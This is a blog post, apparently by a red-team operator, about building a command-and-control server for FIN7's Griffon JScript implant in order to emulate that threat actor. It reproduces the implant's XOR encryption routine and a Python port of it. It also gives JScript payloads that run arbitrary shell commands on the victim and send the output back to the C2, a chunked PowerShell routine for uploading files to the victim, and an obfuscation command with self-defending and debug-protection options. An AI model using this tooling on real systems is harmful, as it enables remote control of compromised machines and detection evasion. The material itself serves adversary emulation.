Writing a C2 - The Journey

As part of my role, sometimes we have to emulate a threat actor. One common threat actor in the financial sector was FIN7.

One of their strains of malware called "Griffon" is best described by Malpedia:

GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.

A version of Griffon was de-obfuscated and posted on the Cyber Threat Intel Repository. I wanted to use the actual Griffon implant in our operation so I set out to write a C2 to interact with it.

The most important pieces to look at in this malware when writing the C2 is:

• How does it send and receive data from the C2

• How does it execute commands from the C2

Communication With C2

When Griffon tries to receive data from the C2, it calls this line: ncommand = send_data("request", "page_id=new", true);

If the C2 has data for the implant, the response from the server is stored in the ncommand variable. ncommand will then be decrypted via the func_crypt_controller function.

function func_crypt_controller(var_type, var_request) {
  try {
    var encryption_key = "";
    if (var_type === "decrypt") {
      var_request = unescape(var_request);
      var request_split = var_request.split("&_&");
      var_request = request_split[0];
      if (request_split.length == 2) {
        encryption_key = request_split[1].split("");
      } else {
        return var_request;
      }
    } else {
      encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split("");
      var_request = unescape(encodeURIComponent(var_request));
    }
    var var_output = new Array(var_request.length);
    for (var i_counter = 0; i_counter < var_request.length; i_counter++) {
      var var_charCode = var_request.charCodeAt(i_counter) ^ encryption_key[i_counter % encryption_key.length].charCodeAt(0);
      var_output[i_counter] = String.fromCharCode(var_charCode);
    }
    var result_string = var_output.join("");
    if (var_type === "encrypt") {
      result_string = result_string + "&_&" + encryption_key.join("");
      result_string = escape(result_string);
    }
    return result_string;
  } catch (e) {
    return "no";
  }
}

The encryption key is then randomly generated and used to encrypt the data to be sent. The encryption key is then appended to the data and then sent to the server.

result_string = result_string + "&_&" + encryption_key.join("");

The decryption process will extract that encryption_key and use it to decrypt the data.

This meant implementing the exact same function on my teamserver would allow the server and agent to talk to eachother successfully.

My python implementation was:

def func_crypt_controller(varType, varRequest):
    try:
        # If data needs to be decrypted
        if varType == "decrypt":
            # Set empty encryption key
            encryptionKey = ""
            # Remove URL encoding
            varRequest = urllib.parse.unquote(varRequest)
            # Isolate data + encryption key
            requestSplit = varRequest.split("&_&")
            # If there is an encryption key, set encryptionKey
            if len(requestSplit) == 2:
                encryptionKey = requestSplit[1]
            else:
                # If there is no encryption key, data is not encrypted - return as-is
                return varRequest

            # This is a piece of unencrypted data from the original griffon payload - we don't want it
            if "zawgkveuwynyjvizs=" in requestSplit[0]:
                # Set theData equal to the original data without the zaw...= string

                theData = requestSplit[0].split("=", 1)[1]
            else:
                # If there is now zaw...= string, the data is good as it is

                theData = requestSplit[0]
            # Create varOutput with the same length as theData
            varOutput = [0] * len(theData)

            # Un-Xor the data
            for iCounter in range(len(theData)):
                varCharCode = ord(theData[iCounter]) ^ ord(
                    encryptionKey[iCounter % len(encryptionKey)]
                )
                varOutput[iCounter] = chr(varCharCode)

            # Turn the array into a string
            resultString = "".join(varOutput)
            # Return the string of decrypted data
            return resultString

        # If data needs to be encrypted
        if varType == "encrypt":
            varOutput = []
            # Generate random encryptionKey
            encryptionKey = list(str(random.randint(1000, 9999)))
            varRequest = str(varRequest)
            # Encrypt the data
            # for iCounter in range(len(varRequest)):
            for iCounter in range(len(varRequest)):
                varCharCode = ord(varRequest[iCounter]) ^ ord(
                    encryptionKey[iCounter % len(encryptionKey)]
                )
                varOutput.append(chr(varCharCode))
            encryptedData = "".join(varOutput)

            # Combine the encrypted data with the encryption key, split by "&_&"
            responseBody = (encryptedData + "&_&" + "".join(encryptionKey)).encode(
                "utf-8"
            )
            # Return the encryped data
            return responseBody

    # If error, print the error and the traceback
    except Exception as _:
        traceback.print_exc()

Executing Commands

Command execution in the implant is as follows:

eval(func_crypt_controller("decrypt", ncommand));

The JScript eval statement will execute arbitrary JScript commands that it receives from the C2. I wanted to make my C2 fully functional without modifying the implant. This meant living off of the land. I had to make use of the internal functions and the eval command to complete all of my tasks.

Here is an example of a "whoami" command that I wrote to run whoami on the implant and return the output to the C2.

command = 'var output = new ActiveXObject("WScript.Shell").Exec("cmd /c whoami").StdOut.ReadAll(); send_data("request", output, true);'

This JScript will create a WScript.Shell object, use it to execute cmd /c whoami, store the output into the output variable, and then call the send_data command with the output to send it to the C2.

Since this command worked, I added a "shell" function to my C2 in the format of: shell {cmd} Which ended up creating the command:

command = f'var output = new ActiveXObject("WScript.Shell").Exec("cmd /c {cmd}").StdOut.ReadAll(); send_data("request", output, true);'

Building the rest

Now that I had commands working with the implant, I needed a way to:

• Register implant

• Interact with multiple implants

  • Basic commands (run command, cd, ls)

• Exit the implant

• Extra features

Register Implant

I created an Agent class: class Agent: def init( self, agentid: str, uid: str, systemName: str, checkinTime: str, commandList: List[str], ):

I created a database that kept track of each agent variable. Upon checking in, the database is checked to see if the agentid exists, if it does not, the implant is registered.

The agentid is a unique string created by sha256 hashing the system name + uid and grabbing the first 8 characters. This is my non-sophisticated way to keep track of unique implants.

Interacting With Multiple Implants

In order to interact with agents, I wanted to create a menu with command options. I ended up having a 2-piece menu. A main menu with generic commands like "showall" to reveal all implants and an implant menu that contained options like shell, pwd, exit.

In order to accomplish this, if the user typed interact [agentid] from the main menu and that agentid was valid, it set a variable to true and accessed a second set of menu options that included the agentid built-in to all of the functions. The user can type back to go back to the main menu and interact with a separate implant.

The commands were the easy part for this -- Since they just involved writing JScript code, I found the following:

• CD

  • new ActiveXObject("WScript.Shell").CurrentDirectory = "{NewDirectory}"

• PWD

  • var output = WScript.CreateObject("Scripting.FileSystemObject").GetFolder(".").Path;

• LS/DIR

  • command = buildCommand("dir " + directoryToView)

  • This calls standard shell execution but provided dir and the path that the user provided

Exiting The Implant

In order to exit the implant, I had to tell the script to exit and remove the agent from my database. To make the script exit - Since it is running JScript commands, I sent the command WScript.Quit(). I then called the removeAgent function for my database, set the interacting to false and brought the user back to the main menu prompt.

Extra Features

• Uploading files

• Obfuscation (All JScript commands before they are sent)

• Meme command

Uploading Files

Because of unfamiliarity with JScript, I did some crazy stuff to get file uploading to work:

• Read file into python and base64 encoded it

• Create a chunk array and split the b64 string into 30000 byte chunks

• Created a command that would use powershell to combine the chunks and base64 decode them to a file

with open(file, "rb") as f:
        b64 = base64.b64encode(f.read())
        b64string = b64.decode("utf-8")
    array = []
    for i in range(0, len(b64string), 30000):
        array.append(b64string[i : i + 30000])
    chunks = [array[x : x + 1] for x in range(0, len(array), 1)]
    for chunk in chunks:
        command = """var shell = new ActiveXObject("WScript.Shell"); """
        for string in chunk:
            command += """var command = "powershell -c Add-Content -Path '{path}' -Value ([System.Convert]::FromBase64String('{string}')) -Encoding Byte"; var running = shell.Exec(command); while(running.Status==0){{WScript.Sleep(50);}}""".format(
                path=path, string=string
            )
        if obfuscatedEnabled:
            command = obfuscated(command)
        addCommand(agentid, command)
    # Give the other powershell commands a second to finish and then respond that the upload is complete
    command = """var shell = new ActiveXObject("WScript.Shell"); WScript.Sleep(1000); send_data("request", "File {path} has finished uploading to {agentid}",true);""".format(
        path=path, agentid=agentid
    )

Obfuscation

Obfuscation was a very fun piece to write for this C2. There is a very cool Javascript Obfuscator and its source code is available here. I went into this project knowing nothing about typescript. Initially the project would take in a JS file and output a JS file but I wanted to be able to send it a JScript string, have it obfuscate it, and have it return a JScript string to STDOUT. My custom version can be found here

Since I am giving it a string as input, I decided to base64 encode the string so the input would look like: ./javascript-obfuscator [base64-encoded-jscript-command] [obfuscation options] I changed the typescript so that the input was read in as a string, base64 decoded, obfuscated, and then sent to stdout.

From the teamserver, I used python to locally execute javascript-obfuscator with the provided commands, and it stores the output in the calling-variable.

jscode = base64.b64encode(jscode.encode("ascii")).decode("ascii")
obfuscatorCommand = f"./{theobfuscator} '{jscode}' --compact true --self-defending true --split-strings true --debug-protection true --string-array true --string-array-rotate true --string-array-shuffle true --string-array-index-shift true --string-array-wrappers-count 5 --string-array-wrappers-type function --string-array-wrappers-parameters-max-count 5 --string-array-wrappers-chained-calls true --simplify true --transform-object-keys true --numbers-to-expressions true --control-flow-flattening true"
   
result = subprocess.run(
        obfuscatorCommand, shell=True, capture_output=True, text=True
)

obfuscatedCode = result.stdout.strip()

return obfuscatedCode

Meme Command

One of my favorite commands from Empire is Invoke-Thunderstruck which will play thunderstruck in the background and keep turning the volume to 100%

To replicate this in JScript, I created an internet explorer ActiveXObject, set it to invisible, and had it navigate to a URL that plays the rickroll music. It can be seen broken down here!

command = """var ie = new ActiveXObject("InternetExplorer.Application"); ie.Visible = false; 
ie.Navigate("about:blank"); 
var xhr = new ActiveXObject("Microsoft.XMLHTTP"); xhr.open("GET", ie.LocationURL, false); 
xhr.setRequestHeader("Content-Type", "video/mp4"); 
xhr.send(); 
ie.Navigate("about:blank"); 
WScript.Sleep(1); 
ie.Document.write("<video controls autoplay><source src=\'https://shattereddisk.github.io/rickroll/rickroll.mp4\' type=\'video/mp4\'></video>");"""
  

The Code

The full source code can be found at my github repo here.